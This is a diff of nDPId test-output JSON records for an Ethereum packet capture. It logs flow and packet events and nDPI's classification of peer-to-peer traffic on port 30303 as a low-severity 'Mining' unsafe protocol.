-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1578508364924,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364924,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtY\/AqAG40frwzd0+dl+QvttrAAAAALAC\/\/85bQAAAgQFtAEDAwUBAQgKItiVxgAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1578508364784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364784,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGswg056VswKgBuHZf3SosjczmxQv4NKAS\/ohsIgAAAgQFoAQCCApgPx7\/ItiUTwEDAwc="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1578508364784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364784,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGnhDAqAG4NOelbN0qdl\/FC\/g0LI3M54AQEAmIYgAAAQEICiLYlUdgPx7\/"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1578508364786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364786,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GKKu\/6qLGwKgBuHZf3SxpEHBBX7euwaAS\/ohj6AAAAgQFoAQCCAo0GJnqItiUTwEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1578508364786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364786,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFbPAqAG4v+qixt0sdl9ft67BaRBwQoAQEAmAJwAAAQEICiLYlUg0GJnq"} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1578508364786,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364787,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1578508364789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364789,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAADMGVclSkdz5wKgBuHZf3TlFnUTdn3ylU6AScSDFhwAAAgQFrAQCCAqGNr5sItiVBQEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1578508364789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364789,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGSNnAqAG4UpHc+d05dl+ffKVTRZ1E3oAQECxU+wAAAQEICiLYlUqGNr5s"} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364714,"flow_last_seen":1578508364790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1578508364790,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1578508364817,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364817,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACgG15goQ5CAwKgBuHZf3TZG9x3QfGwlk6AScSARhwAAAgQFoAQCCApyLMYFItiU0QEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1578508364817,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364817,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGv6DAqAG4KEOQgN02dl98bCWTRvcd0YAQEAmgwgAAAQEICiLYlWVyLMYF"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364659,"flow_last_seen":1578508364819,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1578508364819,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1578508364823,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364823,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACYGE48SimxDwKgBuHZf3S4uwDPtE20MrKAS\/ogQ2gAAAgQFrAQCCAqmusMwItiUTwEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1578508364823,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364823,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+ZbAqAG4EopsQ90udl8TbQysLsAz7oAQECws4QAAAQEICiLYlWmmusMw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364824,"flow_last_seen":1578508364824,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364824,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1578508364824,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364824,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGhG3AqAG4n8tUH906dl\/csM+rAAAAALAC\/\/\/IeAAAAgQFtAEDAwUBAQgKItiVagAAAAAEAgAA"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508364825,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1578508364831,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364831,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAOcGbbUSilEcwKgBuHZf3S\/8FjKFFTVZHKASaN8k0QAAAgQFrAQCCApjgYkbItiUTwEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1578508364831,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364831,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFL7AqAG4EopRHN0vdl8VNVkc\/BYyhoAQECyrKAAAAQEICiLYlW9jgYkb"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364832,"flow_last_seen":1578508364832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364832,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1578508364832,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364832,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGt9PAqAG4ouQdoN07dl+4t7BdAAAAALAC\/\/8\/HwAAAgQFtAEDAwUBAQgKItiVcAAAAAAEAgAA"} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364833,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":471,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1578508364833,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1578508364841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364841,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADcGsuQiYawWwKgBuHZf3SnE3x7vnZqFEqAS\/ojiZQAAAgQFrAQCCAoxzJM4ItiUTwEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1578508364841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364841,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGqezAqAG4ImGsFt0pdl+dmoUSxN8e8IAQECz+XAAAAQEICiLYlXkxzJM4"} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":363,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364842,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508364842,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1578508364862,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364862,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGeCSlFmshwKgBuHZf3SJnRYz4cyqhtKAScSBl3gAAAgQFrAQCCAo1gVUZItiUTwEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1578508364862,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364862,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGaCzAqAG4pRZrId0idl9zKqG0Z0WM+YAQECz0WAAAAQEICiLYlY01gVUZ"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1578508364863,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1578508364877,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364877,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACEGk4U0u88bwKgBuHZf3S3Pd7n11PppgaAS\/oiD+wAAAgQFoAQCCApvJb2EItiUTwEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1578508364877,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364877,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGdI3AqAG4NLvPG90tdl\/U+mmBz3e59oAQEAmf6AAAAQEICiLYlZpvJb2E"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":525,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1578508364879,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364922,"flow_last_seen":1578508364922,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364922,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1578508364922,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364922,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGjuvAqAG4I+nFg909dl+ptEcpAAAAALAC\/\/+OGAAAAgQFtAEDAwUBAQgKItiVxAAAAAAEAgAA"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364924,"flow_last_seen":1578508364924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364924,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1578508364924,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364924,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtY\/AqAG40frwzd0+dl+QvttrAAAAALAC\/\/85bQAAAgQFtAEDAwUBAQgKItiVxgAAAAAEAgAA"} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364925,"flow_last_seen":1578508364925,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364925,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1578508364925,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364925,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHG4wAAEARgdzAqAG4I7T2qXZfdl0As6VnAUq3Z7jOf6Ug2frhkOredmKGawH96dNwPwCsVwwwAuHNRLachJG6Hj8pd5+\/iUKj3xzFalkHy\/4zo7e13\/nakEgcyoOcntMlISOmld4GtANNEoWSHW0IYrUbIiG7qvHSAQP4R7hAGwckxV38aoEQ3R3z6i1sbxgztMaJbhd8mlK6anhGQ6H0+w6JOUS\/FIH4b+eX+gcKRXXgkrfcf69BwK1A+Siq+4ReFiBg"} 00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364925,"flow_last_seen":1578508364925,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364925,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1578508364932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364932,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGkHGfy1QfwKgBuHZf3TprW2X93LDPrKAScSCdQwAAAgQFrAQCCApPeKo9ItiVagEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1578508364932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364932,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGhHnAqAG4n8tUH906dl\/csM+sa1tl\/oAQECwsmQAAAQEICiLYlc1PeKo9"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364932,"flow_last_seen":1578508364932,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364932,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1578508364932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364932,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGvd3AqAG4Etunn90\/dl9+5\/UeAAAAALAC\/\/851wAAAgQFtAEDAwUBAQgKItiVzQAAAAAEAgAA"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364824,"flow_last_seen":1578508364933,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1578508364933,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 